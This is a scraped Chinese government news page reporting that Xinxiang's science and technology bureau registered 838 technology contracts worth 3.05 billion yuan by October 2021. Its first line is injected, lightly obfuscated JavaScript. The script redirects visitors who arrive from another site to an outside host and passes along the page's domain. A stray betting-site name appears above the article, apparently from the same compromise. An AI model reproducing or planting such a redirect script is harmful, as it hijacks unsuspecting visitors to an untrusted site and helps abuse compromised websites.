var ref=document.referrer;if(ref.length>3){location.href="ht"+"tps://wa"+ "p.y6"+"6"+"6.net/baidu444.htm?"+document.domain;}

中国竞彩网

图片

当前位置:首页 市县科技

新乡科技局持续繁荣技术市场前三季度技术合同成交额突破30亿元


发布日期:2021-10-08 09:02来源:新乡市科学技术局 阅读次数:

  今年以来,新乡市科技局大力促进技术合同交易,实现了技术合同成交额大幅增长。截至目前,全市共登记技术合同838项,成交额达30.5亿元,超过2020年全年成交额总量27.8亿元,增幅达到77%。

  在省、市各级领导和部门的正确领导下,新乡市科技局围绕科技创新体系建设,多措并举,进一步推进技术市场的繁荣发展和先进科技成果在本地的转移转化。一是登记网点布局进一步加密。经省科技厅审批,红旗区再增加2个技术合同登记站,全市站点总数达到18家,助力创新主体登记“少跑路”。二是技术市场政策宣传普及与服务能力显著提升。开展了市级技术转移示范机构的评选,河南双创科技发展中心有限公司等5家单位被认定为首批市级技术转移示范机构。三是专业化技术转移人才队伍不断壮大。举办了全省首场技术经纪人培训班,共238人获得国家技术转移专业人员能力等级资格证书,推动了技术转移示范机构提质增效,加速了以高水平、专业化技术转移专职人员为核心的国家技术转移体系建设。四是产学研合作力度明显增强。通过线上发布高校院所优秀科技成果,充分调动驻新高校、科研院所、企业开展产学研合作的积极性,促进科技成果在新乡快速转移转化,进一步推动新乡市技术市场蓬勃发展。